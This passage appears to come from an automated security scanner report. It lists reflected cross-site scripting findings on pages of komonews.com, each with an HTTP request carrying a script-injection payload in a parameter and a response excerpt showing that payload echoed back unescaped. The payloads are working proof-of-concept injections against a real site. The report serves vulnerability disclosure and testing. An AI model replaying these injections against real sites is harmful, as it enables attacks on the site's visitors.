1.72. http://www.komonews.com/news/tech/116596303.html [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.komonews.com
Path:	/news/tech/116596303.html

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload cabb5"><script>alert(1)</script>859f10f2154 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /news/tech/116596303.html?cabb5"><script>alert(1)</script>859f10f2154=1 HTTP/1.1
Host: www.komonews.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: click_mobile=0; __gads=ID=fb409a40cfdb27ca:T=1298497019:S=ALNI_MZ18Qu30UeFAwl_7XbivFuKSXIyQg; __utmz=215150093.1298497003.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); dsnslfpop=1298756207170; __utma=215150093.758392942.1298497003.1298497003.1298497003.1; _vaHC=holdout=false; _vaEngT=1298496998074=10493; __utmc=215150093; _vaTC=uuid=db5fdb52-b687-4958-8cec-e4618ad7c232&cId=hdzFu7&track=true&sendSess=false&seq=3&intEngTimeReport=15000&lastAccess=1298497090922; __utmb=215150093.7.9.1298497088476;

Response

HTTP/1.1 200 OK
Server: Apache
X-Server-Name: dv-c1-r2-u24-b14
Content-Type: text/html;charset=utf-8
Date: Wed, 23 Feb 2011 22:13:55 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: click_mobile=0
Content-Length: 55388

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"
   "http://www.w3.org/TR/html4/loose.dtd">
<html xmlns:fb="http://facebook.com/2008/fbml">
<head>
<title>


                                   Virtual pr
...[SNIP]...
<a name="fb_share" type="box_count" share_url="http://www.komonews.com/news/tech/116596303.html?cabb5"><script>alert(1)</script>859f10f2154=1" href="http://www.facebook.com/sharer.php">
...[SNIP]...

1.73. http://www.komonews.com/news/tech/116609493.html [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.komonews.com
Path:	/news/tech/116609493.html

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 23646"><script>alert(1)</script>23fe8e6f7cb was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /news/tech/116609493.html?23646"><script>alert(1)</script>23fe8e6f7cb=1 HTTP/1.1
Host: www.komonews.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: click_mobile=0; __gads=ID=fb409a40cfdb27ca:T=1298497019:S=ALNI_MZ18Qu30UeFAwl_7XbivFuKSXIyQg; __utmz=215150093.1298497003.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); dsnslfpop=1298756207170; __utma=215150093.758392942.1298497003.1298497003.1298497003.1; _vaHC=holdout=false; _vaEngT=1298496998074=10493; __utmc=215150093; _vaTC=uuid=db5fdb52-b687-4958-8cec-e4618ad7c232&cId=hdzFu7&track=true&sendSess=false&seq=3&intEngTimeReport=15000&lastAccess=1298497090922; __utmb=215150093.7.9.1298497088476;

Response

HTTP/1.1 200 OK
Server: Apache
X-Server-Name: sj-c14-r8-u22-b5
Content-Type: text/html;charset=utf-8
Date: Wed, 23 Feb 2011 22:13:47 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: click_mobile=0
Content-Length: 56187

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"
   "http://www.w3.org/TR/html4/loose.dtd">
<html xmlns:fb="http://facebook.com/2008/fbml">
<head>
<title>


                                   NASA to la
...[SNIP]...
<a name="fb_share" type="box_count" share_url="http://www.komonews.com/news/tech/116609493.html?23646"><script>alert(1)</script>23fe8e6f7cb=1" href="http://www.facebook.com/sharer.php">
...[SNIP]...

1.74. http://www.komonews.com/news/tech/116666119.html [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.komonews.com
Path:	/news/tech/116666119.html

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload f6d81"><script>alert(1)</script>9bc466a742f was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /news/tech/116666119.html?f6d81"><script>alert(1)</script>9bc466a742f=1 HTTP/1.1
Host: www.komonews.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: click_mobile=0; __gads=ID=fb409a40cfdb27ca:T=1298497019:S=ALNI_MZ18Qu30UeFAwl_7XbivFuKSXIyQg; __utmz=215150093.1298497003.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); dsnslfpop=1298756207170; __utma=215150093.758392942.1298497003.1298497003.1298497003.1; _vaHC=holdout=false; _vaEngT=1298496998074=10493; __utmc=215150093; _vaTC=uuid=db5fdb52-b687-4958-8cec-e4618ad7c232&cId=hdzFu7&track=true&sendSess=false&seq=3&intEngTimeReport=15000&lastAccess=1298497090922; __utmb=215150093.7.9.1298497088476;

Response

HTTP/1.1 200 OK
Server: Apache
X-Server-Name: sj-c14-r8-u38-b3
Content-Type: text/html;charset=utf-8
Date: Wed, 23 Feb 2011 22:13:44 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: click_mobile=0
Content-Length: 56275

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"
   "http://www.w3.org/TR/html4/loose.dtd">
<html xmlns:fb="http://facebook.com/2008/fbml">
<head>
<title>


                                   Amazon off
...[SNIP]...
<a name="fb_share" type="box_count" share_url="http://www.komonews.com/news/tech/116666119.html?f6d81"><script>alert(1)</script>9bc466a742f=1" href="http://www.facebook.com/sharer.php">
...[SNIP]...

1.75. http://www.komonews.com/news/tech/116674969.html [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.komonews.com
Path:	/news/tech/116674969.html

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload fb191"><script>alert(1)</script>87907b0c0d was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /news/tech/116674969.html?fb191"><script>alert(1)</script>87907b0c0d=1 HTTP/1.1
Host: www.komonews.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: click_mobile=0; __gads=ID=fb409a40cfdb27ca:T=1298497019:S=ALNI_MZ18Qu30UeFAwl_7XbivFuKSXIyQg; __utmz=215150093.1298497003.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); dsnslfpop=1298756207170; __utma=215150093.758392942.1298497003.1298497003.1298497003.1; _vaHC=holdout=false; _vaEngT=1298496998074=10493; __utmc=215150093; _vaTC=uuid=db5fdb52-b687-4958-8cec-e4618ad7c232&cId=hdzFu7&track=true&sendSess=false&seq=3&intEngTimeReport=15000&lastAccess=1298497090922; __utmb=215150093.7.9.1298497088476;

Response

HTTP/1.1 200 OK
Server: Apache
X-Server-Name: sj-c14-r8-u22-b5
Content-Type: text/html;charset=utf-8
Date: Wed, 23 Feb 2011 22:13:40 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: click_mobile=0
Content-Length: 55904

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"
   "http://www.w3.org/TR/html4/loose.dtd">
<html xmlns:fb="http://facebook.com/2008/fbml">
<head>
<title>


                                   New EU ant
...[SNIP]...
<a name="fb_share" type="box_count" share_url="http://www.komonews.com/news/tech/116674969.html?fb191"><script>alert(1)</script>87907b0c0d=1" href="http://www.facebook.com/sharer.php">
...[SNIP]...

1.76. http://www.komonews.com/news/tech/116740874.html [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.komonews.com
Path:	/news/tech/116740874.html

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload b8ee4"><script>alert(1)</script>f02e797a14e was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /news/tech/116740874.html?b8ee4"><script>alert(1)</script>f02e797a14e=1 HTTP/1.1
Host: www.komonews.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: click_mobile=0; __gads=ID=fb409a40cfdb27ca:T=1298497019:S=ALNI_MZ18Qu30UeFAwl_7XbivFuKSXIyQg; __utmz=215150093.1298497003.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); dsnslfpop=1298756207170; __utma=215150093.758392942.1298497003.1298497003.1298497003.1; _vaHC=holdout=false; _vaEngT=1298496998074=10493; __utmc=215150093; _vaTC=uuid=db5fdb52-b687-4958-8cec-e4618ad7c232&cId=hdzFu7&track=true&sendSess=false&seq=3&intEngTimeReport=15000&lastAccess=1298497090922; __utmb=215150093.7.9.1298497088476;

Response

HTTP/1.1 200 OK
Server: Apache
X-Server-Name: sj-c14-r8-u22-b5
Content-Type: text/html;charset=utf-8
Date: Wed, 23 Feb 2011 22:13:35 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: click_mobile=0
Content-Length: 54983

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"
   "http://www.w3.org/TR/html4/loose.dtd">
<html xmlns:fb="http://facebook.com/2008/fbml">
<head>
<title>


                                   'Gears of
...[SNIP]...
<a name="fb_share" type="box_count" share_url="http://www.komonews.com/news/tech/116740874.html?b8ee4"><script>alert(1)</script>f02e797a14e=1" href="http://www.facebook.com/sharer.php">
...[SNIP]...

1.77. http://www.komonews.com/news/tech/116748424.html [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.komonews.com
Path:	/news/tech/116748424.html

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 888b6"><script>alert(1)</script>aef4ec57354 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /news/tech/116748424.html?888b6"><script>alert(1)</script>aef4ec57354=1 HTTP/1.1
Host: www.komonews.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: click_mobile=0; __gads=ID=fb409a40cfdb27ca:T=1298497019:S=ALNI_MZ18Qu30UeFAwl_7XbivFuKSXIyQg; __utmz=215150093.1298497003.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); dsnslfpop=1298756207170; __utma=215150093.758392942.1298497003.1298497003.1298497003.1; _vaHC=holdout=false; _vaEngT=1298496998074=10493; __utmc=215150093; _vaTC=uuid=db5fdb52-b687-4958-8cec-e4618ad7c232&cId=hdzFu7&track=true&sendSess=false&seq=3&intEngTimeReport=15000&lastAccess=1298497090922; __utmb=215150093.7.9.1298497088476;

Response

HTTP/1.1 200 OK
Server: Apache
X-Server-Name: sj-c14-r8-u38-b3
Content-Type: text/html;charset=utf-8
Date: Wed, 23 Feb 2011 22:13:35 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: click_mobile=0
Content-Length: 53866

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"
   "http://www.w3.org/TR/html4/loose.dtd">
<html xmlns:fb="http://facebook.com/2008/fbml">
<head>
<title>


                                   Apple to u
...[SNIP]...
<a name="fb_share" type="box_count" share_url="http://www.komonews.com/news/tech/116748424.html?888b6"><script>alert(1)</script>aef4ec57354=1" href="http://www.facebook.com/sharer.php">
...[SNIP]...

1.78. http://www.komonews.com/obits [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.komonews.com
Path:	/obits

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload b4713"%3balert(1)//0545c331dec was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as b4713";alert(1)//0545c331dec in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /obits?b4713"%3balert(1)//0545c331dec=1 HTTP/1.1
Host: www.komonews.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: click_mobile=0; __gads=ID=fb409a40cfdb27ca:T=1298497019:S=ALNI_MZ18Qu30UeFAwl_7XbivFuKSXIyQg; __utmz=215150093.1298497003.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); dsnslfpop=1298756207170; __utma=215150093.758392942.1298497003.1298497003.1298497003.1; _vaHC=holdout=false; _vaEngT=1298496998074=10493; __utmc=215150093; _vaTC=uuid=db5fdb52-b687-4958-8cec-e4618ad7c232&cId=hdzFu7&track=true&sendSess=false&seq=3&intEngTimeReport=15000&lastAccess=1298497090922; __utmb=215150093.7.9.1298497088476;

Response

HTTP/1.1 200 OK
Server: Apache
X-Server-Name: sj-c14-r8-u22-b5
Content-Type: text/html;charset=utf-8
Expires: Wed, 23 Feb 2011 22:17:55 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Wed, 23 Feb 2011 22:17:55 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: click_mobile=0
Content-Length: 139592



...[SNIP]...
<script type="text/javascript">
   var current_full_uri = "/obits?&b4713";alert(1)//0545c331dec=1";
   </script>
...[SNIP]...

1.79. http://www.komonews.com/obits/ [chid parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.komonews.com
Path:	/obits/

Issue detail

The value of the chid request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload ae44e"><script>alert(1)</script>c12346d1bee was submitted in the chid parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /obits/?chid=directoryae44e"><script>alert(1)</script>c12346d1bee HTTP/1.1
Host: www.komonews.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: click_mobile=0; __gads=ID=fb409a40cfdb27ca:T=1298497019:S=ALNI_MZ18Qu30UeFAwl_7XbivFuKSXIyQg; __utmz=215150093.1298497003.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); dsnslfpop=1298756207170; __utma=215150093.758392942.1298497003.1298497003.1298497003.1; _vaHC=holdout=false; _vaEngT=1298496998074=10493; __utmc=215150093; _vaTC=uuid=db5fdb52-b687-4958-8cec-e4618ad7c232&cId=hdzFu7&track=true&sendSess=false&seq=3&intEngTimeReport=15000&lastAccess=1298497090922; __utmb=215150093.7.9.1298497088476;

Response

HTTP/1.1 200 OK
Server: Apache
X-Server-Name: dv-c1-r1-u24-b6
Content-Type: text/html;charset=utf-8
Expires: Wed, 23 Feb 2011 22:15:12 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Wed, 23 Feb 2011 22:15:12 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: click_mobile=0
Content-Length: 47749

...[SNIP]...
<a href="?chid=directoryae44e"><script>alert(1)</script>c12346d1bee&pg=2" rel="next">
...[SNIP]...

1.80. http://www.komonews.com/obits/ [chid parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.komonews.com
Path:	/obits/

Issue detail

The value of the chid request parameter is copied into an HTML comment. The payload 2d095--><script>alert(1)</script>44936aaff1a was submitted in the chid parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /obits/?chid=directory2d095--><script>alert(1)</script>44936aaff1a HTTP/1.1
Host: www.komonews.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: click_mobile=0; __gads=ID=fb409a40cfdb27ca:T=1298497019:S=ALNI_MZ18Qu30UeFAwl_7XbivFuKSXIyQg; __utmz=215150093.1298497003.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); dsnslfpop=1298756207170; __utma=215150093.758392942.1298497003.1298497003.1298497003.1; _vaHC=holdout=false; _vaEngT=1298496998074=10493; __utmc=215150093; _vaTC=uuid=db5fdb52-b687-4958-8cec-e4618ad7c232&cId=hdzFu7&track=true&sendSess=false&seq=3&intEngTimeReport=15000&lastAccess=1298497090922; __utmb=215150093.7.9.1298497088476;

Response

HTTP/1.1 200 OK
Server: Apache
X-Server-Name: dv-c1-r2-u24-b7
Content-Type: text/html;charset=utf-8
Expires: Wed, 23 Feb 2011 22:15:15 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Wed, 23 Feb 2011 22:15:15 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: click_mobile=0
Content-Length: 47754



...[SNIP]...
<script>alert(1)</script>44936aaff1a
       page 1
       nextpage 2
       nextURL ?chid=directory2d095-->
...[SNIP]...

1.81. http://www.komonews.com/obits/ [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.komonews.com
Path:	/obits/

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 5d9d3"%3balert(1)//07f466772f8 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 5d9d3";alert(1)//07f466772f8 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /obits/?5d9d3"%3balert(1)//07f466772f8=1 HTTP/1.1
Host: www.komonews.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: click_mobile=0; __gads=ID=fb409a40cfdb27ca:T=1298497019:S=ALNI_MZ18Qu30UeFAwl_7XbivFuKSXIyQg; __utmz=215150093.1298497003.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); dsnslfpop=1298756207170; __utma=215150093.758392942.1298497003.1298497003.1298497003.1; _vaHC=holdout=false; _vaEngT=1298496998074=10493; __utmc=215150093; _vaTC=uuid=db5fdb52-b687-4958-8cec-e4618ad7c232&cId=hdzFu7&track=true&sendSess=false&seq=3&intEngTimeReport=15000&lastAccess=1298497090922; __utmb=215150093.7.9.1298497088476;

Response

HTTP/1.1 200 OK
Server: Apache
X-Server-Name: sj-c14-r8-u22-b5
Content-Type: text/html;charset=utf-8
Expires: Wed, 23 Feb 2011 22:18:41 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Wed, 23 Feb 2011 22:18:41 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: click_mobile=0
Content-Length: 139593



...[SNIP]...
<script type="text/javascript">
   var current_full_uri = "/obits/?&5d9d3";alert(1)//07f466772f8=1";
   </script>
...[SNIP]...

1.82. http://www.komonews.com/opinion/kenschram/116741919.html [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.komonews.com
Path:	/opinion/kenschram/116741919.html

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload ca69c"><script>alert(1)</script>9fc7fa49d2e was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /opinion/kenschram/116741919.html?ca69c"><script>alert(1)</script>9fc7fa49d2e=1 HTTP/1.1
Host: www.komonews.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: click_mobile=0; __gads=ID=fb409a40cfdb27ca:T=1298497019:S=ALNI_MZ18Qu30UeFAwl_7XbivFuKSXIyQg; __utmz=215150093.1298497003.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); dsnslfpop=1298756207170; __utma=215150093.758392942.1298497003.1298497003.1298497003.1; _vaHC=holdout=false; _vaEngT=1298496998074=10493; __utmc=215150093; _vaTC=uuid=db5fdb52-b687-4958-8cec-e4618ad7c232&cId=hdzFu7&track=true&sendSess=false&seq=3&intEngTimeReport=15000&lastAccess=1298497090922; __utmb=215150093.7.9.1298497088476;

Response

HTTP/1.1 200 OK
Server: Apache
X-Server-Name: dv-c1-r1-u24-b6
Content-Type: text/html;charset=utf-8
Date: Wed, 23 Feb 2011 22:15:09 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: click_mobile=0
Content-Length: 53233

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"
   "http://www.w3.org/TR/html4/loose.dtd">
<html xmlns:fb="http://facebook.com/2008/fbml">
<head>
<title>


                                   The Schram
...[SNIP]...
<a name="fb_share" type="box_count" share_url="http://www.komonews.com/opinion/kenschram/116741919.html?ca69c"><script>alert(1)</script>9fc7fa49d2e=1" href="http://www.facebook.com/sharer.php">
...[SNIP]...

1.83. http://www.komonews.com/sports/116570948.html [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.komonews.com
Path:	/sports/116570948.html

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 2daa5"><script>alert(1)</script>8d3a804d9c1 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /sports/116570948.html?2daa5"><script>alert(1)</script>8d3a804d9c1=1 HTTP/1.1
Host: www.komonews.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: click_mobile=0; __gads=ID=fb409a40cfdb27ca:T=1298497019:S=ALNI_MZ18Qu30UeFAwl_7XbivFuKSXIyQg; __utmz=215150093.1298497003.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); dsnslfpop=1298756207170; __utma=215150093.758392942.1298497003.1298497003.1298497003.1; _vaHC=holdout=false; _vaEngT=1298496998074=10493; __utmc=215150093; _vaTC=uuid=db5fdb52-b687-4958-8cec-e4618ad7c232&cId=hdzFu7&track=true&sendSess=false&seq=3&intEngTimeReport=15000&lastAccess=1298497090922; __utmb=215150093.7.9.1298497088476;

Response

HTTP/1.1 200 OK
Server: Apache
X-Server-Name: dv-c1-r1-u24-b6
Content-Type: text/html;charset=utf-8
Date: Wed, 23 Feb 2011 22:15:22 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: click_mobile=0
Content-Length: 57905

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"
   "http://www.w3.org/TR/html4/loose.dtd">
<html xmlns:fb="http://facebook.com/2008/fbml">
<head>
<title>


                                   Vargas, Fi
...[SNIP]...
<a name="fb_share" type="box_count" share_url="http://www.komonews.com/sports/116570948.html?2daa5"><script>alert(1)</script>8d3a804d9c1=1" href="http://www.facebook.com/sharer.php">
...[SNIP]...

1.84. http://www.komonews.com/sports/116572113.html [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.komonews.com
Path:	/sports/116572113.html

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 48b8c"><script>alert(1)</script>02763aa42e7 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /sports/116572113.html?48b8c"><script>alert(1)</script>02763aa42e7=1 HTTP/1.1
Host: www.komonews.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: click_mobile=0; __gads=ID=fb409a40cfdb27ca:T=1298497019:S=ALNI_MZ18Qu30UeFAwl_7XbivFuKSXIyQg; __utmz=215150093.1298497003.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); dsnslfpop=1298756207170; __utma=215150093.758392942.1298497003.1298497003.1298497003.1; _vaHC=holdout=false; _vaEngT=1298496998074=10493; __utmc=215150093; _vaTC=uuid=db5fdb52-b687-4958-8cec-e4618ad7c232&cId=hdzFu7&track=true&sendSess=false&seq=3&intEngTimeReport=15000&lastAccess=1298497090922; __utmb=215150093.7.9.1298497088476;

Response

HTTP/1.1 200 OK
Server: Apache
X-Server-Name: dv-c1-r2-u7-b6
Content-Type: text/html;charset=utf-8
Date: Wed, 23 Feb 2011 22:15:27 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: click_mobile=0
Content-Length: 59866

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"
   "http://www.w3.org/TR/html4/loose.dtd">
<html xmlns:fb="http://facebook.com/2008/fbml">
<head>
<title>


                                   Photos: 20
...[SNIP]...
<a name="fb_share" type="box_count" share_url="http://www.komonews.com/sports/116572113.html?48b8c"><script>alert(1)</script>02763aa42e7=1" href="http://www.facebook.com/sharer.php">
...[SNIP]...

1.85. http://www.komonews.com/sports/116601093.html [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.komonews.com
Path:	/sports/116601093.html

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 9352c"><script>alert(1)</script>525cb61d364 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /sports/116601093.html?9352c"><script>alert(1)</script>525cb61d364=1 HTTP/1.1
Host: www.komonews.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: click_mobile=0; __gads=ID=fb409a40cfdb27ca:T=1298497019:S=ALNI_MZ18Qu30UeFAwl_7XbivFuKSXIyQg; __utmz=215150093.1298497003.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); dsnslfpop=1298756207170; __utma=215150093.758392942.1298497003.1298497003.1298497003.1; _vaHC=holdout=false; _vaEngT=1298496998074=10493; __utmc=215150093; _vaTC=uuid=db5fdb52-b687-4958-8cec-e4618ad7c232&cId=hdzFu7&track=true&sendSess=false&seq=3&intEngTimeReport=15000&lastAccess=1298497090922; __utmb=215150093.7.9.1298497088476;

Response

HTTP/1.1 200 OK
Server: Apache
X-Server-Name: dv-c1-r2-u7-b6
Content-Type: text/html;charset=utf-8
Date: Wed, 23 Feb 2011 22:15:19 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: click_mobile=0
Content-Length: 54767

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"
   "http://www.w3.org/TR/html4/loose.dtd">
<html xmlns:fb="http://facebook.com/2008/fbml">
<head>
<title>


                                   Formula On
...[SNIP]...
<a name="fb_share" type="box_count" share_url="http://www.komonews.com/sports/116601093.html?9352c"><script>alert(1)</script>525cb61d364=1" href="http://www.facebook.com/sharer.php">
...[SNIP]...

1.86. http://www.komonews.com/sports/116612208.html [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.komonews.com
Path:	/sports/116612208.html

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload d8f55"><script>alert(1)</script>e47ddffc89d was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /sports/116612208.html?d8f55"><script>alert(1)</script>e47ddffc89d=1 HTTP/1.1
Host: www.komonews.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: click_mobile=0; __gads=ID=fb409a40cfdb27ca:T=1298497019:S=ALNI_MZ18Qu30UeFAwl_7XbivFuKSXIyQg; __utmz=215150093.1298497003.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); dsnslfpop=1298756207170; __utma=215150093.758392942.1298497003.1298497003.1298497003.1; _vaHC=holdout=false; _vaEngT=1298496998074=10493; __utmc=215150093; _vaTC=uuid=db5fdb52-b687-4958-8cec-e4618ad7c232&cId=hdzFu7&track=true&sendSess=false&seq=3&intEngTimeReport=15000&lastAccess=1298497090922; __utmb=215150093.7.9.1298497088476;

Response

HTTP/1.1 200 OK
Server: Apache
X-Server-Name: dv-c1-r2-u24-b7
Content-Type: text/html;charset=utf-8
Date: Wed, 23 Feb 2011 22:15:18 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: click_mobile=0
Content-Length: 54887

